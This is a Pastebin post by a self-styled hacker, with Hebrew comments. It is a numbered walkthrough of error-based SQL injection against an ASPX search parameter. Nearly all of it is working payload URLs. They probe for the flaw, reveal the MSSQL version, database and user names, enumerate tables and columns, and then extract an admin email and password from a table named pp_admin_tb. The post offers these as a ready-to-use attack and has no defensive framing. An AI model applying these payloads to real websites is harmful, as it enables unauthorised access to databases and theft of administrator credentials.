Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- ASPX Injection is also similar to PHP based SQL Injection
- נוסיף גרש בשביל לבדוק אם יש פגיעה
- 1:
- http://website.org/search.aspx?txt=EDIT’
- [http://www.interload.co.il/upload/7523377.jpg]
- 2:
- having 1=1
- http://website.org/search.aspx?txt=EDIT' having 1=1--
- [http://www.interload.co.il/upload/6799804.jpg]
- 3:
- לבדוק תגירסא
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,@@version)--
- [http://www.interload.co.il/upload/7281846.jpg]
- 4:
- כדי לדעת את שם מסד הנתונים
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,db_name())--
- [http://www.interload.co.il/upload/9341072.jpg]
- 5:
- לבדוק שם משתמש
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,user_name())--
- [http://www.interload.co.il/upload/8894171.jpg]
- 6:
- לברור את שמות הטבלה
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables))--
- [http://www.interload.co.il/upload/6959797.jpg]
- 7:
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('pp_category')))--
- 8:
- לגלות את העמודות "pp_admin_tb"
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb' and column_name not in('adminsign_id')))-- (email_is)
- [http://www.interload.co.il/upload/5097816.jpg]
- 9:
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb' and column_name not in('adminsign_id','email_id')))-- (password)
- [http://www.interload.co.il/upload/5497103.jpg]
- עכשיו נעשה חילוץ נתונים כגון השם משתמש והסיסמא
- במקרה שלנו המייל זה השם משתמש
- name table :pp_admin_tb
- eamil_id
- password
- 10:
- עכשיו נחלץ את השם משתמש
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 email_id from pp_admin_tb))--
- [http://www.interload.co.il/upload/2031325.jpg]
- 11:
- עכשיו נחלץ את הסיסמא
- http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 password from pp_admin_tb))--
- [http://www.interload.co.il/upload/7595613.jpg]
- #zurael_sTz
Add Comment
Please, Sign In to add comment